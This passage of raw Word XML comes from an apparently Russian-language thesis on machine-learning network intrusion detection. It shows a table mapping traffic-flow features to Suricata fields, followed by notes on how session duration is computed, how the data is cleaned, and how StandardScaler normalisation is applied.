          </w:tcPr>
          <w:p w14:paraId="76EF9FE1"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Количество пакетов от получателя</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B94753" w:rsidRPr="007818DC" w14:paraId="3F70EB91" w14:textId="77777777" w:rsidTr="00B94753">
        <w:trPr>
          <w:trHeight w:val="599"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2825" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="081E42C6"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fwd_bytes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2486" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BF46459"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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007818DC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>flow.bytes</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007818DC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>_toserver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4318" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39BA6992"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Объём данных от источника (байт)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B94753" w:rsidRPr="007818DC" w14:paraId="678339B5" w14:textId="77777777" w:rsidTr="00B94753">
        <w:trPr>
          <w:trHeight w:val="834"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2825" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B84F87B"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bwd_bytes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2486" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="573D42A0"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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007818DC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>flow.bytes</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007818DC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>_toclient</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4318" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6431D9F3"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Объём данных от получателя (байт)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B94753" w:rsidRPr="007818DC" w14:paraId="2E53EE3B" w14:textId="77777777" w:rsidTr="00B94753">
        <w:trPr>
          <w:trHeight w:val="560"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2825" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A5659DF"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dest_port</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2486" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DC27163"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dest_port</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4318" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2784D7B4"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Порт назначения</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="299B936F" w14:textId="65DB4065" w:rsidR="00CD546F" w:rsidRPr="00CD546F" w:rsidRDefault="00CD546F" w:rsidP="002E66B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD546F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Продолжение таблицы 1</w:t>
      </w:r>
      <w:r w:rsidR="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="96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2486"/>
        <w:gridCol w:w="4318"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B94753" w:rsidRPr="007818DC" w14:paraId="41F2B367" w14:textId="77777777" w:rsidTr="00B94753">
        <w:trPr>
          <w:trHeight w:val="468"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2825" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3504D503" w14:textId="4E947FBA"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2486" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="156C962E" w14:textId="18CFA44B"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c>
          <w:tcPr>
            <w:tcW w:w="4318" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01CA1E22" w14:textId="278D313B"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B94753" w:rsidRPr="007818DC" w14:paraId="4B1CD5B3" w14:textId="77777777" w:rsidTr="00B94753">
        <w:trPr>
          <w:trHeight w:val="742"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2825" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11A12834"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proto_tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2486" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E8FFAC0"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proto</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4318" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="249389DE" w14:textId="2F4EC5E1"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Флаг протокола TCP (0/1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B94753" w:rsidRPr="007818DC" w14:paraId="70A044F1" w14:textId="77777777" w:rsidTr="00B94753">
        <w:trPr>
          <w:trHeight w:val="911"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2825" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C1D5724"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bytes_per_sec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2486" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CA4AFBB"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вычисляемый</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4318" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34F686DB"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Скорость передачи данных (байт/с)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B94753" w:rsidRPr="007818DC" w14:paraId="5B08972D" w14:textId="77777777" w:rsidTr="00B94753">
        <w:trPr>
          <w:trHeight w:val="930"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2825" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DBE1FE2"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pkts_per_sec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2486" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41DA031C"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вычисляемый</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4318" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63B61320"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Интенсивность пакетов (пакет/с)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B94753" w:rsidRPr="007818DC" w14:paraId="0C6EC2F2" w14:textId="77777777" w:rsidTr="00B94753">
        <w:trPr>
          <w:trHeight w:val="934"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2825" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="585CD7AC"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bytes_per_pkt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2486" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CCABEEB"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вычисляемый</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4318" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="090B2A9F"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Средний размер пакета (байт)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B94753" w:rsidRPr="007818DC" w14:paraId="3E9D1A56" w14:textId="77777777" w:rsidTr="00B94753">
        <w:trPr>
          <w:trHeight w:val="630"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2825" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09CAD7F5"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fwd_bwd_pkt_ratio</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2486" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45CB80C2"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вычисляемый</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4318" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B177981"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Асимметрия пакетов</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B94753" w:rsidRPr="007818DC" w14:paraId="59778757" w14:textId="77777777" w:rsidTr="00B94753">
        <w:trPr>
          <w:trHeight w:val="876"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2825" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="517BC4DE"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fwd_bwd_bytes_ratio</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2486" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="143C64C6"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вычисляемый</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4318" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BF2B786"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Асимметрия объёмов данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B94753" w:rsidRPr="007818DC" w14:paraId="75694444" w14:textId="77777777" w:rsidTr="00B94753">
        <w:trPr>
          <w:trHeight w:val="1046"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2825" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="023417A9"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fwd_bytes_per_pkt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2486" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="237C4DCB"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вычисляемый</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4318" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72C11C58"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Средний размер исходящего пакета</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B94753" w:rsidRPr="007818DC" w14:paraId="0D5D8ACA" w14:textId="77777777" w:rsidTr="00B94753">
        <w:trPr>
          <w:trHeight w:val="908"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2825" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05B07461"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bwd_bytes_per_pkt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2486" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D6D57A5"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вычисляемый</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4318" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46C84DCD"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Средний размер входящего пакета</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B94753" w:rsidRPr="007818DC" w14:paraId="74D8D9B8" w14:textId="77777777" w:rsidTr="00B94753">
        <w:trPr>
          <w:trHeight w:val="1260"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2825" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60E41973"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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007818DC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>pkt_asymmetry</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2486" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29B142BF"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вычисляемый</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4318" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="105A576E" w14:textId="77777777" w:rsidR="00B94753" w:rsidRPr="007818DC" w:rsidRDefault="00B94753" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007818DC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Нормализованная асимметрия потока</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E2561FA" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B2C90A8" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00C853A6" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C853A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Особого внимания заслуживает признак длительности сессии (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C853A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>duration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C853A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">). В отличие от датасета CIC-IDS, где длительность представлена отдельным полем, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C853A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C853A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> фиксирует время начала (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C853A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>flow.start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C853A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) и окончания (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C853A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>flow.end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C853A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) сессии, а длительность вычисляется как их разность. Данное несоответствие было выявлено в ходе практической интеграции и устранено на уровне модуля извлечения признаков.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697D1731" w14:textId="4EE77167" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00CD546F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C853A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Перед обучением выполнена очистка данных: замена значений </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C853A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>NaN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C853A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и бесконечных значений нулями, нормализация всех признаков методом </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C853A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>StandardScaler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AA70B6" w:rsidRPr="00AA70B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00191A78" w:rsidRPr="00191A78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="0056080C" w:rsidRPr="0056080C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F60519" w:rsidRPr="00F60519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="0056080C" w:rsidRPr="0056080C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C853A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Параметры нормализатора сохранены в файл scaler_v2.pkl для последующего применения при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>анализе</w:t>
      </w:r>
      <w:r w:rsidRPr="00C853A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12320996" w14:textId="77777777" w:rsidR="002E66B7" w:rsidRDefault="002E66B7" w:rsidP="00CD546F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50F2A968" w14:textId="784ECFDA" w:rsidR="00402025" w:rsidRDefault="00402025" w:rsidP="009D45A4">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc231673291"/>
      <w:r w:rsidRPr="00402025">
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00402025">
        <w:t>Проверка собственных механизмов безопасности</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="2D34948D" w14:textId="77777777" w:rsidR="00351289" w:rsidRPr="00402025" w:rsidRDefault="00351289" w:rsidP="00402025">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D5AC433" w14:textId="386AFAF0" w:rsidR="00402025" w:rsidRDefault="00351289" w:rsidP="00CD5AEA">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00351289">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
